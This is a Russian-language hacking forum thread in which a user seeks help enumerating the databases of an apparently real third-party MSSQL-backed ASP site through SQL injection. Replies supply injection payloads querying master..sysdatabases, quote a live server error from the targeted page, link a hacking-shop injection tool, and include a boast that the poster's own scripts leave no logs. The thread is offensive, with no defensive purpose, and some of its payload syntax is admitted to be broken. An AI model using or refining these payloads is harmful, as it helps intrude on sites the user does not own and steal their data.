MSSQL Injection вопрос
 

Каким методом можно получить список существующих баз данных?

show databases;

Это не то. Мне через багу в скрипте надо узнать все существующие базы.

запрос типа .asp?ID=1'INJECTION

http://hack-shop.org.ru/board/showthread.php?t=24

спасибо, помог :)
Только что-то select top 2 start at 1 не пашет

на единицу ругается Incorrect syntax near '1'

чтоб все поперебирать можно так select top 1 name from master..sysdatabases where name not in ('master','tempdb','bla bla','и так далее')

я знаю, но кавычки ставить нельзя.

Запрос гласит вывести 2 строчки начиная с 1

можно использывать order by checksum

-1+or+1=(select+top+1+start+at+2+name+from+master.. sysdatabases)--

ответ:

Microsoft OLE DB Provider for ODBC Drivers error '80040e14'

[Microsoft][ODBC SQL Server Driver][SQL Server]Line 1: Incorrect syntax near '1'.

/newsstory.asp, line 15


что означает, это выражение я понял, не могу понять в чем ошибка синтаксиса

а так пробывали?

Теперь на at ругается :)

Incorrect syntax near 'at'.

Скажу по секрету такая конструкция в принцыпе не должна работать хоть я и не тестил...

http://hack-shop.org.ru/mssql.php

Get db

Ладно, спасибо ты мне кое в чем всетаки помог и не впервые ;)
Насчет скрипта http://hack-shop.org.ru/mssql.php, спасиб не нужно, у меня свои есть.
На моих скриптах логи не ведутся))))))

sh-smoker
может тебе есть смысл в аську стучать )

Так теперь и буду делать ;)

dddddd